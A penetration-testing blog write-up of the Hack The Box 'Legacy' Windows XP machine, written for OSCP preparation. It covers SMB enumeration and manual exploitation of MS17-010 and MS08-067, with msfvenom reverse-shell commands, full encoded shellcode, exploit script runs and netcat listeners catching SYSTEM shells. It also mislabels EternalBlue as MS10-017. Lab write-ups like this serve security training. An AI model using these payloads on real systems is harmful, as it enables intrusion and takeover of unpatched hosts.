TJ_Null’s OSCP Prep – HTB – Legacy
This Windows XP box had two vulnerabilities. MS10-017 (Eternal blue) and MS08-067. I will in this blog post go through both of them without metasploit. For testing purpose I tried using metasploit first to verify that it was actually eternal blue.
When manually exploiting the vulnearbilites I used helviojunior’s and areyou1or0 scripts. I had alot of trouble installing pip with python2 since python2 is deprecated. I fixed it however using this method. When initially getting a shell, we are immediatly NT AUTHORITY/SYSTEM not needing to do privilege escalation.
I also switched from ParrotOS to Kali. Even though I like ParrotOS alot, using a more popular distro is better for troubleshooting and OSCP will be taken using Kali. So I made the switch and moved all my tools over to Kali. They both are great OS’s and I dont prefer one over the other.
Table Of Contents
Enumeration
┌─[root@parrotos]─[/home/aghanim/Desktop/HTB/legacy]
└──╼ #nmap -sC -sV -p- --min-rate 10000 10.10.10.4 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-05 18:43 GMT
Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 50.00% done; ETC: 18:46 (0:01:06 remaining)
Nmap scan report for 10.10.10.4
Host is up (0.081s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h59m29s, deviation: 1h24m50s, median: 4d23h59m29s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:e4:a8 (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-01-10T22:45:36+02:00
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.20 seconds
The OS is Windows XP.
There were only two ports open. Port 139 and port 445. Port 445 gave us a hint that this might be an eternal blue vulnerability.
Using NMAPS vuln scripts I verfied that the target was vulnerable to MS10-017 and MS08-067.
┌──(root💀kali)-[/home/aghanim/Desktop/toolbox/impacket]
└─# nmap --script vuln 10.10.10.4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-06 16:14 EST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.4
Host is up (0.038s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
Nmap done: 1 IP address (1 host up) scanned in 83.30 seconds
From MITRE on MS08-067
[…] allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization[…]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4250
and on MS10-017
[…] allows remote attackers to execute arbitrary code via crafted packets, aka “Windows SMB Remote Code Execution Vulnerability. […]
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
From the NMAP output we can see that the OS is Windows XP.
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
Enumeration SMB
Using enum4linux
┌──(root💀kali)-[/home/aghanim/Desktop/toolbox/impacket]
└─# enum4linux -A 10.10.10.4
Unknown option: A
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jan 6 16:48:54 2022
==========================
| Target Information |
==========================
Target ........... 10.10.10.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==================================================
| Enumerating Workgroup/Domain on 10.10.10.4 |
==================================================
[+] Got domain/workgroup name: HTB
==========================================
| Nbtstat Information for 10.10.10.4 |
==========================================
Looking up status of 10.10.10.4
LEGACY <00> - B <ACTIVE> Workstation Service
HTB <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
LEGACY <20> - B <ACTIVE> File Server Service
HTB <1e> - <GROUP> B <ACTIVE> Browser Service Elections
HTB <1d> - B <ACTIVE> Master Browser
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
MAC Address = 00-50-56-B9-54-63
===================================
| Session Check on 10.10.10.4 |
===================================
[+] Server 10.10.10.4 allows sessions using username '', password ''
=========================================
| Getting domain SID for 10.10.10.4 |
=========================================
Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup
====================================
| OS information on 10.10.10.4 |
====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.4 from smbclient:
[+] Got OS info for 10.10.10.4 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
===========================
| Users on 10.10.10.4 |
===========================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=======================================
| Share Enumeration on 10.10.10.4 |
=======================================
[E] Can't list shares: NT_STATUS_ACCESS_DENIED
[+] Attempting to map shares on 10.10.10.4
==================================================
| Password Policy Information for 10.10.10.4 |
==================================================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.10.4 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.4)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[E] Failed to get password policy with rpcclient
============================
| Groups on 10.10.10.4 |
============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=====================================================================
| Users on 10.10.10.4 via RID cycling (RIDS: 500-550,1000-1050) |
=====================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===========================================
| Getting printer info for 10.10.10.4 |
===========================================
No printers returned.
enum4linux complete on Thu Jan 6 16:48:58 2022
Nothing too interesting. We will now try to get a shell on the box.
Initial Access
There are two methods to getting shell on this box wihtout using metasploit. The first method is using MS17-010. In this method we generate a msfvenom payload, and use send_and_execute script from helviojuniors repository. This script sends the generated payload to the target machine and execute it, giving us a conneciton with netcat. This script will not crash the target.
The second method, MS08-067 is kind of the same; we generate a payload in msfvenom and add the payload to the script. The script need to know the version of the OS we are using. This script will crash the target, so if you choose the wrong version you have to resett the machine.
Method 1 – MS17-010
First we generate a payload using msfvenom.
┌──(root💀kali)-[/home/aghanim/Desktop/toolbox/impacket]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > ms17–010.exe
This payload uses reverse_tcp, setting the LHOST to our attacking machine, and LPORT of our own choosing. The file extension will be exe and output this to ms17_010.exe.
We then start a netcat listener and execute the script.
┌──(root💀kali)-[/home/…/Desktop/HTB/legacy/MS17-010]
└─# python2 send_and_execute.py 10.10.10.4 ms17–010.exe 445 2 ⚙
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x821e6010
SESSION: 0xe21b8428
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1769b10
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1769bb0
overwriting token UserAndGroups
Sending file IX9SAW.exe...
Opening SVCManager on 10.10.10.4.....
Creating service FLSs.....
Starting service FLSs.....
The NETBIOS connection with the remote host timed out.
Removing service FLSs.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
Looking at our listener, we should have a shell.
┌──(root💀kali)-[/home/aghanim]
└─# netcat -lvnp 4444 1 ⨯
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.4] 1031
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Method 2 – MS08-067
We first generate a payload using msfvenom. This EXITFUNC option sets a function hash in the payload that specifies a. DLL and function to call when the payload is complete.
┌──(root💀kali)-[/home/aghanim/Desktop/toolbox/impacket]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1488 bytes
unsigned char buf[] =
"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x6f\xdb\xc7\xb7\x83\xee\xfc\xe2\xf4\x93\x33\x45\xb7\x6f\xdb"
"\xa7\x3e\x8a\xea\x07\xd3\xe4\x8b\xf7\x3c\x3d\xd7\x4c\xe5\x7b"
"\x50\xb5\x9f\x60\x6c\x8d\x91\x5e\x24\x6b\x8b\x0e\xa7\xc5\x9b"
"\x4f\x1a\x08\xba\x6e\x1c\x25\x45\x3d\x8c\x4c\xe5\x7f\x50\x8d"
"\x8b\xe4\x97\xd6\xcf\x8c\x93\xc6\x66\x3e\x50\x9e\x97\x6e\x08"
"\x4c\xfe\x77\x38\xfd\xfe\xe4\xef\x4c\xb6\xb9\xea\x38\x1b\xae"
"\x14\xca\xb6\xa8\xe3\x27\xc2\x99\xd8\xba\x4f\x54\xa6\xe3\xc2"
"\x8b\x83\x4c\xef\x4b\xda\x14\xd1\xe4\xd7\x8c\x3c\x37\xc7\xc6"
"\x64\xe4\xdf\x4c\xb6\xbf\x52\x83\x93\x4b\x80\x9c\xd6\x36\x81"
"\x96\x48\x8f\x84\x98\xed\xe4\xc9\x2c\x3a\x32\xb3\xf4\x85\x6f"
"\xdb\xaf\xc0\x1c\xe9\x98\xe3\x07\x97\xb0\x91\x68\x24\x12\x0f"
"\xff\xda\xc7\xb7\x46\x1f\x93\xe7\x07\xf2\x47\xdc\x6f\x24\x12"
"\xe7\x3f\x8b\x97\xf7\x3f\x9b\x97\xdf\x85\xd4\x18\x57\x90\x0e"
"\x50\xdd\x6a\xb3\xcd\xbd\x61\xd0\xaf\xb5\x6f\xca\x9b\x3e\x89"
"\xb1\xd7\xe1\x38\xb3\x5e\x12\x1b\xba\x38\x62\xea\x1b\xb3\xbb"
"\x90\x95\xcf\xc2\x83\xb3\x37\x02\xcd\x8d\x38\x62\x07\xb8\xaa"
"\xd3\x6f\x52\x24\xe0\x38\x8c\xf6\x41\x05\xc9\x9e\xe1\x8d\x26"
"\xa1\x70\x2b\xff\xfb\xb6\x6e\x56\x83\x93\x7f\x1d\xc7\xf3\x3b"
"\x8b\x91\xe1\x39\x9d\x91\xf9\x39\x8d\x94\xe1\x07\xa2\x0b\x88"
"\xe9\x24\x12\x3e\x8f\x95\x91\xf1\x90\xeb\xaf\xbf\xe8\xc6\xa7"
"\x48\xba\x60\x27\xaa\x45\xd1\xaf\x11\xfa\x66\x5a\x48\xba\xe7"
"\xc1\xcb\x65\x5b\x3c\x57\x1a\xde\x7c\xf0\x7c\xa9\xa8\xdd\x6f"
"\x88\x38\x62";
Copy the payload and paste in the script.
In the scripts there are 7 options to set the correct OS. Since from our enumeration stage know that this is a Windows XP machine, this narrows it down.
Start a netcat listneer and then run this script using this command.
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/legacy]
└─# python2 ms08-67.py 10.10.10.4 6 445
Looking at our listener we see that we have a shell.
┌──(root💀kali)-[/home/aghanim]
└─# netcat -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.4] 1049
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Further enumeration
Since the shell spawned in both methods are NT Authority/SYSTEM we dont need to privilege escalate and can just read both the user.txt and root.txt.
We could however enumerate further so get a idea of what we are looking at. Since we had to know the SP using method 2, we know that this box run Service Pack 3.
Listing the users we can see that there are two users, john and Administrator.
C:\>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
C:\>net users
net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
john SUPPORT_388945a0
The command completed with one or more errors.